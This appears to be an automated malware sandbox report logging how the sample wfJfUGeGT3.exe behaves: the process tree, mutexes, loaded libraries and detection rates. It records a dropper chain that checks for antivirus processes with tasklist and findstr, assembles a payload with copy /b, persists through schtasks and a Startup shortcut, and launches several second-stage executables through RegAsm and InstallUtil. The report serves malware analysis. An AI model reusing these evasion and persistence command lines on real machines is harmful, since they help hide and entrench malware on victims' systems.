19_2_00614148

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061C9DA CoInitialize,CoCreateInstance,CoUninitialize,

19_2_0061C9DA

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

19_2_0061443D

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif

File created: C:\Users\user\AppData\Local\TrackGuard Technologies

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\349587345342
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Mutant created: \Sessions\1\BaseNamedObjects\QGOn8xsapkNWVjl5
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Mutant created: \Sessions\1\BaseNamedObjects\1623b75a3df63053c0bc46185e9e5487
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_03

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

File created: C:\Users\user\AppData\Local\Temp\nsgC9EA.tmp

Jump to behavior

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit

Source: wfJfUGeGT3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wfJfUGeGT3.exe	ReversingLabs: Detection: 13%
Source: wfJfUGeGT3.exe	Virustotal: Detection: 13%

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

File read: C:\Users\user\Desktop\wfJfUGeGT3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wfJfUGeGT3.exe "C:\Users\user\Desktop\wfJfUGeGT3.exe"
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe "C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: srvcli.dll	Jump to behavior
